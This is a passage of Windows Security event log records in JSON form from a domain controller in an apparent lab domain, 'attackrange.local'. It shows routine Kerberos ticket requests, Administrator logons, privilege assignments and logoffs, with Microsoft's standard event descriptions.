Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220490,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220491,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C287\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6c287","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220492,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C287\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6c287","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220493,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x664A9\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x664a9","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220494,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C287\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6c287","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220495,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220496,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220497,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220498,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C2C6\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6c2c6","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220499,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C2C6\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6c2c6","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220500,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220501,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220502,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
